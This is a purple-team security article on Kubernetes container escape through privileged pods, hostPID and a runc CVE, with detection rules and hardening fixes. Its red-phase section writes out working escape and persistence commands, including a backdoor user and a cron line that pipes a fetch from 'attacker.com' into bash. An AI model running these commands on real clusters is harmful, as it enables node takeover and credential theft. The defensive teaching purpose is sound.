Container Escape Archives

Reading Time: 17 minutes

What is purple team security → OWASP Top 10 mapped to cloud infrastructure → Cloud security breaches 2020–2025 → Broken access control in AWS → MFA fatigue attacks → CI/CD secrets exposure → SSRF to cloud metadata → Kubernetes Container Escape

TL;DR

Kubernetes container escape is OWASP A04 + A05: a container deployed with --privileged, hostPID, or hostNetwork is not meaningfully isolated from the host — two commands can produce a root shell on the node
The kernel does not enforce Kubernetes namespace semantics. Container isolation comes from Linux namespaces, cgroups, and seccomp. --privileged removes those boundaries — the kernel sees no difference between the container and the host
Three primary escape paths: privileged container with host device access, hostPID + nsenter, and runc CVEs (CVE-2019-5736) that allow a malicious container to overwrite the runc binary during exec
Detection requires kernel-level visibility: Falco fires on privilege container exec; Tetragon traces nsenter and mount syscalls at the point of the kernel hook, not a process name check that can be evaded
The structural fix is PodSecurity admission enforcing the Restricted profile at the namespace level — policy that blocks --privileged, hostPID, hostNetwork, and mounts before a pod ever schedules
Network policy as a secondary layer: even if a container escapes to the node, a network policy that blocks the escaped process from reaching the Kubernetes API server limits lateral movement to the cluster control plane

OWASP Mapping: A04 Insecure Design — --privileged placed in production workloads because the development environment never enforced boundaries. A05 Security Misconfiguration — absence of PodSecurity admission, RuntimeClass, and seccomp profiles.

The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│              KUBERNETES CONTAINER ESCAPE — ATTACK SURFACE               │
│                                                                         │
│  ┌──────────────────────────────────────────────────────────────┐       │
│  │                     KUBERNETES NODE                          │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (--privileged)                             │   │       │
│  │  │                                                       │   │       │
│  │  │  web app ──▶ exploit ──▶ shell in container          │   │       │
│  │  │                           │                           │   │       │
│  │  │  PATH 1: mount /dev/sda1  │                           │   │       │
│  │  │  ──────────────────────── ▼                           │   │       │
│  │  │  chroot /mnt/host → root shell on node                │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (hostPID=true)                             │   │       │
│  │  │                                                       │   │       │
│  │  │  PATH 2: nsenter -t 1 -m -u -i -n -p -- bash         │   │       │
│  │  │  ─────────────────────────────────────────────────▶   │   │       │
│  │  │           root shell in host PID 1 namespaces         │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (runc CVE)                                 │   │       │
│  │  │                                                       │   │       │
│  │  │  PATH 3: overwrite /proc/self/exe during runc exec    │   │       │
│  │  │  ─────────────────────────────────────────────────▶   │   │       │
│  │  │           arbitrary code execution as root on node    │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  Node root → kubectl access → cluster-admin via node creds  │       │
│  └──────────────────────────────────────────────────────────────┘       │
│                                                                         │
│  DETECTION LAYER        │  STRUCTURAL FIX                               │
│  Falco / Tetragon       │  PodSecurity Restricted                       │
│  mount syscall hooks    │  RuntimeClass (gVisor/Kata)                   │
│  audit logs             │  Seccomp + no-new-privileges                  │
└─────────────────────────────────────────────────────────────────────────┘

Kubernetes container escape is the point where a compromised application pod becomes a compromised Kubernetes node — and from a node, an attacker reaches the kubelet credential, the node’s service account, and often a path to cluster-admin. The boundary between container and host is not the Kubernetes API. It is Linux namespaces, cgroups, and seccomp. When you remove those with --privileged, you remove the boundary.

The Incident: –privileged “Just for Debugging”

A networking issue in staging. The developer can’t get the CNI tracing they need from inside the normal container. Someone adds --privileged: true to the pod spec to expose /sys/class/net and the raw packet socket. The PR merges. The staging deployment works. The --privileged flag stays in the manifest when staging gets promoted to production.

Six months later, the web application running in that pod has an RCE vulnerability. The attacker gets a shell.

Inside the container, two commands:

mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host /bin/bash

Root on the node. Not escalation through a kernel exploit. Not a zero-day. Just mounting the device that was always accessible because --privileged was set.

The node has a kubelet credential and a service account token with broader permissions than the compromised application ever needed. From the node, lateral movement into the cluster control plane is a matter of using credentials that are already there.

This is A04 (Insecure Design) and A05 (Security Misconfiguration) combined: the design didn’t account for what happens when the boundary is removed, and no enforcement mechanism prevented the configuration from reaching production.

Why the Kernel Doesn’t Know About Kubernetes

Kubernetes namespaces are a scheduler and API concept. When you create a Kubernetes namespace and apply RBAC to it, you are controlling what the Kubernetes API server will accept — you are not creating a kernel isolation boundary between workloads in different namespaces.

Kernel isolation comes from:

Linux namespaces (PID, net, mount, IPC, UTS, user)
  ├── Created by container runtime (containerd, crio)
  ├── Container processes run inside these namespaces
  └── From inside: host PIDs, host network, host filesystem are not visible

cgroups
  ├── Limit CPU, memory, and device access per container
  └── Prevent runaway resource consumption and limit device access scope

seccomp profiles
  ├── Filter system calls the container is allowed to invoke
  └── Block ptrace, mount, CAP_SYS_ADMIN and other privileged syscalls

Capabilities
  ├── Fine-grained kernel privileges (CAP_NET_ADMIN, CAP_SYS_ADMIN, etc.)
  └── --privileged grants ALL capabilities + disables seccomp + disables AppArmor

--privileged removes all three layers simultaneously. It grants every capability, disables the default seccomp filter, and disables AppArmor confinement. A privileged container is effectively a process running on the host with a different filesystem view — and with mount, you can fix even the filesystem view.

Red Phase: The Three Escape Paths

Path 1: –privileged Container

A privileged container has CAP_SYS_ADMIN, which includes the ability to mount arbitrary block devices. On a node with a standard Linux filesystem, /dev/sda1 or equivalent contains the host root filesystem.

Check if the current container is privileged:

# CapEff shows the effective capability set as a hex bitmask
cat /proc/1/status | grep CapEff
# CapEff: 0000003fffffffff

# Decode it
capsh --decode=0000003fffffffff | grep -o 'cap_sys_admin'
# cap_sys_admin — present means privileged

Full escape sequence:

# Step 1: Identify the host block device
# /proc/mounts shows what the container runtime mounted
cat /proc/mounts | grep ' / '
# overlay on / type overlay (rw,...,upperdir=/var/lib/containerd/...)

# Or: check fdisk/lsblk — visible in privileged container
lsblk
# NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
# sda      8:0    0   80G  0 disk
# ├─sda1   8:1    0   79G  0 part /
# └─sda2   8:2    0    1G  0 part [SWAP]

# Step 2: Mount host root filesystem
mkdir -p /mnt/host
mount /dev/sda1 /mnt/host

# Step 3a: Write attacker SSH key to host authorized_keys
echo "ssh-rsa AAAA..." >> /mnt/host/root/.ssh/authorized_keys

# Step 3b: Or take an immediate root shell via chroot
chroot /mnt/host /bin/bash
# Now running as root in the host filesystem
# id: uid=0(root) gid=0(root)

# Step 4: From host root — access kubelet credentials
cat /etc/kubernetes/pki/ca.crt
# Or pull the node's bootstrap token / client cert for API server access
ls /var/lib/kubelet/pki/

What persistence looks like from node root:

# Add a backdoor user to host /etc/passwd
chroot /mnt/host useradd -m -s /bin/bash -G sudo backdoor
chroot /mnt/host passwd backdoor

# Or: schedule a cron job on the host
echo "* * * * * root curl http://attacker.com/c2 | bash" \
  >> /mnt/host/etc/cron.d/maintenance

Path 2: hostPID / hostNetwork Escape

hostPID: true is a less obvious escape path than --privileged but equally dangerous. When a container shares the host PID namespace, it can see and interact with every process running on the node — including PID 1, which is running in the host’s full namespace set.

With hostPID enabled, nsenter produces a host root shell without mounting anything:

# From inside the container — see all host processes
ps aux
# This will show containerd, kubelet, systemd, sshd — everything on the node

# nsenter: enter the namespaces of PID 1 (host init process)
# -t 1: target PID 1
# -m: enter mount namespace (host filesystem)
# -u: enter UTS namespace (host hostname)
# -i: enter IPC namespace
# -n: enter network namespace
# -p: enter PID namespace
nsenter -t 1 -m -u -i -n -p -- bash

# Now running in host namespaces
hostname   # shows node hostname, not container hostname
mount | grep " / "  # shows host root mount, not container overlay
id         # uid=0(root) gid=0(root)

nsenter — a Linux utility that enters the namespaces of an existing process. With -t 1 it enters PID 1’s namespaces, which are the host’s namespaces. The result is a shell that sees the host filesystem, host network, and host process tree as if running directly on the node.

hostNetwork: true on its own does not directly produce a root shell, but it exposes the node’s network interfaces and allows binding to host ports. Combined with access to the cloud provider’s instance metadata service (IMDS), it enables credential theft from the node’s IAM role — the attack path covered in SSRF to cloud metadata and IMDSv1 exploitation.

Path 3: runc CVE Escape (CVE-2019-5736)

CVE-2019-5736 is a different attack class — it does not require a misconfiguration in the pod spec. It exploits a race condition in the runc container runtime itself.

The mechanism:

1. Attacker controls a container image
2. Image's entrypoint is a symlink: /proc/self/exe → /runc (or similar path)
3. Operator runs: kubectl exec -it <pod> -- /bin/bash
4. runc reads /proc/self/exe to find its own binary path during exec
5. Attacker's process in container has a brief window to overwrite /proc/self/exe
6. Race condition: attacker overwrites the runc binary on the host with malicious binary
7. On next runc exec, malicious binary runs as root on the host

The detection signature for runc-class escapes is writes to /proc/self/exe or writes to paths that correspond to runc’s host binary location from within a container process:

# Simplified bpftrace detection of /proc/self/exe writes (safe to run as read):
# This shows the pattern — Tetragon implements this as a continuous policy

bpftrace -e '
tracepoint:syscalls:sys_enter_write {
  // Track write() calls where the fd points to /proc/self/exe
  // In production: Tetragon handles this at the LSM hook level
  printf("PID %d comm %s writing fd %d\n", pid, comm, args->fd);
}
' 2>/dev/null | head -20

Patched versions of runc (1.0.0-rc7+, containerd 1.2.3+) fix the race condition. The practical implication: node patching is the only fix for runc-class CVEs — pod security policy cannot prevent a vulnerability in the container runtime itself.

Safe Simulation: Audit Your Cluster Before an Attacker Does

These commands are read-only and safe to run against any cluster you have kubectl access to:

# Find all pods running with --privileged
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.containers[].securityContext.privileged == true) |
    [.metadata.namespace, .metadata.name, 
     (.spec.containers[] | select(.securityContext.privileged == true) | .name)] |
    join(" / ")' | \
  sort -u

# Find pods with hostPID or hostNetwork
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.hostPID == true or .spec.hostNetwork == true) |
    [.metadata.namespace, .metadata.name,
     (if .spec.hostPID then "hostPID" else "" end),
     (if .spec.hostNetwork then "hostNetwork" else "" end)] |
    join(" / ")' | \
  grep -v "/$" | \
  sort -u

# Check for pods using hostPath mounts (host filesystem access via volume)
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.volumes[]?.hostPath != null) |
    [.metadata.namespace, .metadata.name,
     (.spec.volumes[] | select(.hostPath != null) |
      .name + "→" + .hostPath.path)] |
    join(" / ")' | \
  sort -u

# Check DaemonSets — these often run privileged and cover every node
kubectl get daemonsets -A -o json | \
  jq -r '.items[] |
    select(.spec.template.spec.containers[].securityContext.privileged == true) |
    [.metadata.namespace, .metadata.name] | join("/")' | \
  sort -u

Blue Phase: eBPF Detection

Detecting container escape attempts requires visibility below the Kubernetes API layer. Audit logs show pod creation — they do not show what a process inside the container does with mount, nsenter, or /proc/self/exe. eBPF-based tools (Falco, Tetragon) attach to kernel hooks and observe syscalls regardless of what namespace or container they originate from.

Falco: Privileged Container and Mount Detection

# Falco rules for container escape detection
# /etc/falco/rules.d/container-escape.yaml

# Rule 1: Privileged container started
- rule: Privileged Container Started
  desc: >
    A container running with --privileged was started.
    This removes all capability and seccomp restrictions.
  condition: >
    container.privileged = true and
    evt.type = execve and
    container.id != host
  output: >
    Privileged container started
    (user=%user.name user_uid=%user.uid
     command=%proc.cmdline
     container_id=%container.id
     container_name=%container.name
     image=%container.image.repository:%container.image.tag
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: WARNING
  tags: [container, privilege-escalation, OWASP-A05]

# Rule 2: Mount syscall from inside a container
- rule: Container Mount Syscall
  desc: >
    A process inside a container invoked mount().
    In a non-privileged container this fails; in a privileged container
    it succeeds and may be mounting host block devices.
  condition: >
    evt.type = mount and
    container.id != host and
    not proc.name in (container_runtime_processes)
  output: >
    Mount syscall from container
    (user=%user.name
     command=%proc.cmdline
     mount_source=%evt.arg.source
     mount_target=%evt.arg.target
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: ERROR
  tags: [container, privilege-escalation, OWASP-A04]

# Rule 3: nsenter or chroot invoked inside container
- rule: Namespace Enter or Chroot in Container
  desc: >
    nsenter or chroot executed from within a running container.
    nsenter with -t 1 enters host namespaces directly.
  condition: >
    evt.type = execve and
    container.id != host and
    proc.name in (nsenter, chroot)
  output: >
    nsenter/chroot executed in container
    (user=%user.name
     command=%proc.cmdline
     parent=%proc.pname
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: ERROR
  tags: [container, privilege-escalation, T1611]

# Rule 4: Process reading host PID tree (hostPID indicator)
- rule: Container Reading Host Process List
  desc: >
    A process inside a container is reading /proc entries for PIDs
    that don't belong to it — indicates hostPID=true and enumeration.
  condition: >
    evt.type = openat and
    fd.name startswith /proc/ and
    fd.name endswith /status and
    container.id != host and
    not fd.name startswith /proc/self
  output: >
    Container reading host process status
    (proc=%proc.cmdline fd=%fd.name
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: WARNING
  tags: [container, discovery, T1057]

Tetragon: TracingPolicy for nsenter and Mount Syscalls

Tetragon attaches eBPF programs at LSM (Linux Security Module) hooks and kernel function entry/exit points. Unlike Falco which uses a single tracepoint aggregation model, Tetragon can enforce at the kernel level — it can block a syscall before it completes, not just alert after the fact.

# Tetragon TracingPolicy: detect and optionally block container escape attempts
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: container-escape-detection
  namespace: kube-system
spec:
  kprobes:
    # Hook 1: sys_mount — detect any mount() call from a container process
    - call: "sys_mount"
      return: false
      syscall: true
      args:
        - index: 0
          type: "string"     # source device (e.g. /dev/sda1)
        - index: 1
          type: "string"     # target mount point
        - index: 2
          type: "string"     # filesystem type
      selectors:
        # Only fire for container processes (not the container runtime itself)
        - matchNamespaces:
          - namespace: Pid
            operator: NotIn
            values:
              - "host_pid_ns"   # Replace with actual host PID NS value
          matchActions:
          - action: Post        # Post = log; change to Sigkill to enforce

    # Hook 2: __x64_sys_execve for nsenter binary
    - call: "__x64_sys_execve"
      return: false
      syscall: true
      args:
        - index: 0
          type: "string"     # filename being executed
      selectors:
        - matchArgs:
          - index: 0
            operator: Postfix
            values:
              - "/nsenter"
          matchActions:
          - action: Post

  # Hook 3: write to /proc/self/exe — runc CVE class indicator
  kprobes:
    - call: "vfs_write"
      return: false
      syscall: false
      args:
        - index: 0
          type: "file"
      selectors:
        - matchArgs:
          - index: 0
            operator: Postfix
            values:
              - "/proc/self/exe"
          matchActions:
          - action: Sigkill   # Block immediately — no legitimate use case for this write

bpftrace: Quick Node-Level Validation

Before deploying Tetragon, you can validate that mount syscalls are observable from the host using bpftrace directly on a node:

# Run on the Kubernetes node (requires root or CAP_BPF)
# Safe observation mode — shows mount attempts from any process including containers

bpftrace -e '
tracepoint:syscalls:sys_enter_mount {
  printf("%-8d %-20s %-30s -> %-30s type=%s\n",
    pid, comm,
    str(args->dev_name),   // source device
    str(args->dir_name),   // mount target
    str(args->type));      // filesystem type
}
' 2>/dev/null
# Sample output:
# PID      COMM                 SOURCE                         TARGET                         TYPE
# 38471    bash                 /dev/sda1                      /mnt/host                      ext4
# 38471 and comm=bash from inside a container = escape attempt in progress

# Watch for nsenter executions across all processes on the node
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
  if (str(args->filename) == "/usr/bin/nsenter" ||
      str(args->filename) == "/bin/nsenter") {
    printf("nsenter called: pid=%d ppid=%d comm=%s\n",
      pid, curtask->real_parent->pid, comm);
  }
}
' 2>/dev/null

What Kubernetes Audit Logs Show (and What They Miss)

Kubernetes audit logs record API server activity. They show pod creation with --privileged set — but only if you are watching pod spec creation events. They do not show anything that happens inside the container after it starts.

# Enable audit policy to capture pod creation with privileged spec
# /etc/kubernetes/audit-policy.yaml (excerpt)

apiVersion: audit.k8s.io/v1
kind: Policy
rules:
  # Log pod creation at RequestResponse level (captures full spec)
  - level: RequestResponse
    resources:
      - group: ""
        resources: ["pods"]
    verbs: ["create", "update", "patch"]

  # Log exec into pods — this is the entry point for escape attempts
  - level: RequestResponse
    resources:
      - group: ""
        resources: ["pods/exec"]
    verbs: ["create"]

# Parse audit log for privileged pod creation
grep '"privileged":true' /var/log/kubernetes/audit.log | \
  jq -r '[
    .requestReceivedTimestamp,
    .user.username,
    .objectRef.namespace + "/" + .objectRef.name,
    "privileged=true"
  ] | join(" | ")'

# Or via kubectl (if audit log backend is configured)
kubectl get events -A --field-selector reason=Created \
  -o json | \
  jq -r '.items[] |
    select(.message | contains("privileged")) |
    [.metadata.namespace, .involvedObject.name, .message] |
    join(" / ")'

The audit log gap is important to understand: audit logs are a first-alert layer for misconfigured pod creation, not a detection layer for in-progress escape. By the time you see a pod/exec event in audit logs, the attacker already has a shell. eBPF-based detection at the syscall level is what catches the escape itself.

Purple Phase: Structural Fixes

Fix 1: PodSecurity Admission — Enforce Restricted Profile

PodSecurity admission (built into Kubernetes 1.25+, replacing PodSecurityPolicy) enforces security profiles at the namespace level. The Restricted profile blocks --privileged, hostPID, hostNetwork, hostPath volumes, and requires dropping all capabilities.

# Enforce the Restricted PodSecurity profile on a namespace
# This blocks any pod that doesn't meet the criteria from scheduling
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    # enforce: pod is rejected at admission if spec violates Restricted
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    # audit: violations are logged but not rejected (useful for rollout)
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/audit-version: latest
    # warn: user gets a warning but pod is allowed (for migration)
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/warn-version: latest

What Restricted profile blocks (relevant to escape paths):

# These settings are REQUIRED by Restricted — apply them explicitly
# to avoid the admission webhook rejecting your workloads

securityContext:
  # Pod-level
  runAsNonRoot: true
  seccompProfile:
    type: RuntimeDefault    # or Localhost with a custom profile

containers:
  - securityContext:
      allowPrivilegeEscalation: false
      privileged: false          # blocks Path 1
      capabilities:
        drop: ["ALL"]            # no CAP_SYS_ADMIN, no CAP_NET_ADMIN
        add: []                  # add only what is specifically required
      readOnlyRootFilesystem: true  # reduces attacker persistence options

# Pod spec — blocked by Restricted
spec:
  hostPID: false           # must be false (blocks Path 2)
  hostNetwork: false       # must be false
  hostIPC: false           # must be false
  volumes:                 # hostPath volumes blocked
    - name: app-data
      emptyDir: {}         # emptyDir, configMap, secret allowed; hostPath not

Rollout approach for existing clusters:

Start with warn mode on all namespaces, identify violations, remediate, then promote to enforce:

# Label all non-system namespaces with warn mode first
kubectl get namespaces -o json | \
  jq -r '.items[] |
    select(.metadata.name | test("^(kube-system|kube-public|kube-node-lease)$") | not) |
    .metadata.name' | \
  while read ns; do
    kubectl label namespace "$ns" \
      pod-security.kubernetes.io/warn=restricted \
      pod-security.kubernetes.io/warn-version=latest \
      --overwrite
    echo "Labeled $ns"
  done

# After a deployment cycle, check for warnings in admission logs
# Look for pods that would be rejected under enforce mode
kubectl get events -A --field-selector reason=FailedCreate \
  -o json | jq -r '.items[] | select(.message | contains("violates PodSecurity"))'

Fix 2: RuntimeClass — Hardware-Level Isolation for Untrusted Workloads

For workloads that cannot run under Restricted profile (CNI plugins, monitoring agents, specific DaemonSets), the alternative is a stronger isolation boundary: a hypervisor-level runtime.

gVisor and Kata Containers intercept system calls at a layer between the container and the Linux kernel, so a container escape exploiting a kernel vulnerability or a privileged mount hits the sandbox boundary, not the host kernel.

# Define a RuntimeClass for gVisor (runsc)
# Requires gVisor installed on nodes with the runsc runtime handler
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc   # must match the handler name in containerd/crio config
scheduling:
  nodeSelector:
    runtime.gvisor: "true"   # only schedule on nodes that have gVisor
---
# Use the RuntimeClass in a pod spec
apiVersion: v1
kind: Pod
metadata:
  name: untrusted-workload
spec:
  runtimeClassName: gvisor   # all syscalls go through gVisor's sentry
  containers:
    - name: app
      image: untrusted-image:latest

# Kata Containers: hardware VM boundary, not just a user-space syscall interceptor
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: kata-containers
handler: kata-qemu

For operators: gVisor and Kata Containers have compatibility trade-offs. Not all syscalls are supported in gVisor (it implements a subset of the Linux ABI). Kata Containers have higher startup latency (VM boot time). Benchmark your specific workload before enforcing these on production-critical pods.

Fix 3: Seccomp Profile — Block the Syscalls That Enable Escape

Even without gVisor, a custom seccomp profile that explicitly denies mount, unshare, and clone with namespace flags closes the primary escape syscall surface.

{
  "defaultAction": "SCMP_ACT_ERRNO",
  "architectures": ["SCMP_ARCH_X86_64", "SCMP_ARCH_X86", "SCMP_ARCH_X32"],
  "syscalls": [
    {
      "names": [
        "accept", "accept4", "access", "arch_prctl",
        "bind", "brk", "capget", "capset",
        "chdir", "chmod", "chown", "clock_gettime",
        "clone",
        "close", "connect",
        "dup", "dup2", "dup3",
        "execve", "exit", "exit_group",
        "fchmod", "fchown", "fcntl",
        "fstat", "fstatfs", "fsync",
        "futex", "getcwd", "getdents64",
        "getegid", "geteuid", "getgid", "getgroups",
        "getpeername", "getpid", "getppid",
        "getrlimit", "getsockname", "getsockopt",
        "gettid", "gettimeofday", "getuid",
        "inotify_add_watch", "inotify_init1",
        "listen", "lseek", "lstat",
        "madvise", "mmap", "mprotect",
        "munmap", "nanosleep",
        "open", "openat",
        "pipe", "pipe2", "poll", "ppoll",
        "prctl", "pread64", "pwrite64",
        "read", "readlink", "readv",
        "recvfrom", "recvmsg", "recvmmsg",
        "rename", "rt_sigaction", "rt_sigprocmask",
        "rt_sigreturn", "sched_getaffinity",
        "select", "sendfile", "sendmsg", "sendto",
        "set_robust_list", "set_tid_address",
        "setgid", "setgroups", "setuid",
        "setsockopt", "shutdown",
        "socket", "socketpair",
        "stat", "statfs", "symlink",
        "tgkill", "time", "timerfd_create",
        "timerfd_settime", "truncate",
        "uname", "unlink", "unlinkat",
        "wait4", "waitid",
        "write", "writev"
      ],
      "action": "SCMP_ACT_ALLOW"
    }
  ]
}

Apply via pod spec:

spec:
  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: "container-escape-block.json"
      # Profile must be in /var/lib/kubelet/seccomp/ on each node

# Distribute the seccomp profile to all nodes via DaemonSet
# Example using a DaemonSet that copies the profile file on startup
# (or use the built-in RuntimeDefault which blocks ~300 dangerous syscalls)

# RuntimeDefault blocks: mount, unshare, clone with new-ns flags,
# add_key, keyctl, request_key, pivot_root — adequate for most workloads
spec:
  securityContext:
    seccompProfile:
      type: RuntimeDefault

Fix 4: Network Policy — Contain the Blast Radius After Escape

Even if a container escapes to the node, a network policy that prevents the escaped process from reaching the Kubernetes API server limits what the attacker can do with node credentials.

# Deny all egress from application namespace to Kubernetes API server
# The API server typically runs on port 6443 on the control plane nodes
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-api-server-egress
  namespace: production
spec:
  podSelector: {}       # applies to all pods in namespace
  policyTypes:
    - Egress
  egress:
    # Allow DNS
    - ports:
        - protocol: UDP
          port: 53
    # Allow application traffic (customize per workload)
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: production
    # Explicitly: no rule allowing egress to control plane CIDR
    # This is a deny-by-absence — egress to control plane falls through to default deny

# Also block pod-to-pod communication across namespaces
# to prevent an escaped pod from pivoting to other workloads
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: production
spec:
  podSelector: {}
  policyTypes:
    - Ingress
    - Egress
  # No ingress or egress rules = deny all
  # Add specific rules above this as needed

Fix 5: Node Isolation — Co-location Risk

An internet-facing pod and a pod with access to sensitive internal services should not share a node. If the internet-facing pod escapes, it reaches the node’s credentials and can pivot to anything else scheduled on that node.

# Use node selectors, taints, and tolerations to separate workload tiers

# Taint sensitive nodes so only specific workloads schedule there
kubectl taint nodes sensitive-node-1 workload-tier=sensitive:NoSchedule

# Internet-facing pods: dedicated public-tier nodes
# Internal/privileged pods: dedicated sensitive-tier nodes

# Pod spec for internet-facing workload — only schedules on public nodes
spec:
  nodeSelector:
    workload-tier: public
  tolerations: []   # No toleration for sensitive node taint

# Pod spec for sensitive workload — only schedules on sensitive nodes
spec:
  nodeSelector:
    workload-tier: sensitive
  tolerations:
    - key: workload-tier
      operator: Equal
      value: sensitive
      effect: NoSchedule

⚠ Production Gotchas

Legitimate workloads that require –privileged or hostPID. CNI plugins (Cilium, Calico, Flannel node agents), node-local-dns, monitoring agents (node exporters, eBPF-based agents like Tetragon itself), and storage drivers often need elevated access. Blanket enforcement of Restricted profile without exceptions breaks these workloads. The approach: enforce Restricted on application namespaces; use a dedicated namespace for infrastructure DaemonSets with the Baseline or Privileged policy and compensate with Falco detection and node isolation.

Seccomp Restricted blocks some monitoring agents. The default Restricted seccomp profile blocks several syscalls that APM agents and profiling tools use. Run strace -c -f ./your-agent to capture the syscall profile of your monitoring agent before enforcing Restricted. Common culprits: perf_event_open (used by profilers), ptrace (used by some debuggers), bpf (used by eBPF-based tools). Add these to an allowlist seccomp profile rather than running the agent without any profile.

runc CVEs require node patching, not policy. PodSecurity admission and Falco rules protect against configuration-based escapes. A vulnerability in runc, containerd, or the Linux kernel itself bypasses policy-based controls entirely. Keep container runtime versions current; enable automatic node OS patching (Bottlerocket, Flatcar Linux) if your infrastructure allows it. Subscribe to CVE feeds for containerd (containerd/containerd) and runc (opencontainers/runc) specifically.

hostPath volumes are a partial equivalent to –privileged. A pod without --privileged but with a hostPath volume mounting /etc or /var/lib/kubelet can read node credentials without needing to mount a block device. PodSecurity Restricted blocks hostPath entirely; Baseline allows it. Audit for hostPath volumes separately from --privileged.

RuntimeClass with gVisor has syscall compatibility gaps. Applications that use io_uring, certain socket options, or kernel modules will not work under gVisor’s sentry. Test in staging before deploying to production. The gVisor compatibility matrix is documented at gvisor.dev/docs/user_guide/compatibility — check it for any application that does direct filesystem I/O at high volume (databases, high-throughput queues) as the overhead may be unacceptable even if the syscalls are supported.

Quick Reference

Escape Path	Precondition	Detection Signal	Structural Fix
Privileged container → mount	`privileged: true`	Falco: mount syscall from container; Tetragon: sys_mount kprobe	PodSecurity Restricted enforce; seccomp blocks mount
hostPID + nsenter	`hostPID: true`	Falco: nsenter exec in container; audit log: pod creation with hostPID	PodSecurity Restricted; blocks hostPID
hostNetwork + IMDS	`hostNetwork: true`	CloudTrail: IMDSv1 call from unexpected source	Enforce IMDSv2 hop limit 1; PodSecurity Restricted
runc CVE (CVE-2019-5736)	Unpatched runc	Tetragon: vfs_write to /proc/self/exe	Patch runc/containerd; use RuntimeClass (gVisor)
hostPath volume mount	hostPath to sensitive path	Falco: sensitive host file access; PodSecurity audit	PodSecurity Restricted (blocks hostPath)
Escaped → API server	Node credential access	Audit log: API calls from node IP at unexpected time	Network policy blocking node→API server egress

Key Takeaways

Kubernetes container escape starts at the kernel: --privileged, hostPID, and hostNetwork remove Linux namespace and cgroup isolation — the Kubernetes API cannot prevent what happens inside a process that runs with those flags
Two commands from privileged container to root on the node: mount /dev/sda1 /mnt/host and chroot /mnt/host /bin/bash — this is not a sophisticated exploit, it is a default kernel behavior
eBPF detection (Falco, Tetragon) operates at the syscall level and catches the escape in progress; Kubernetes audit logs only catch the misconfigured pod creation, not the exploitation
PodSecurity Restricted enforcement at the namespace level is the structural fix for configuration-based escapes — it blocks --privileged, hostPID, hostNetwork, and hostPath volumes before a pod schedules
runc-class CVEs are independent of configuration — node-level patching and RuntimeClass (gVisor/Kata) isolation are the controls, not policy enforcement
Network policy as a secondary layer limits post-escape lateral movement: a container that escapes to the node should not be able to reach the API server with stolen node credentials

What’s Next

Container escape requires access to a running pod. But what if the attacker didn’t need to exploit anything at runtime — they shipped the attack as a dependency your build pipeline trusted? EP09 covers supply chain attacks from SolarWinds to XZ Utils: how a malicious package or a compromised build step becomes arbitrary code execution before the container ever runs, the detection patterns that are specific to supply chain compromise (dependency confusion, typosquatting, malicious maintainer takeovers), and the SLSA framework controls that create a verifiable chain of custody from source to deployed artifact.

Get EP09 in your inbox when it publishes → subscribe at linuxcent.com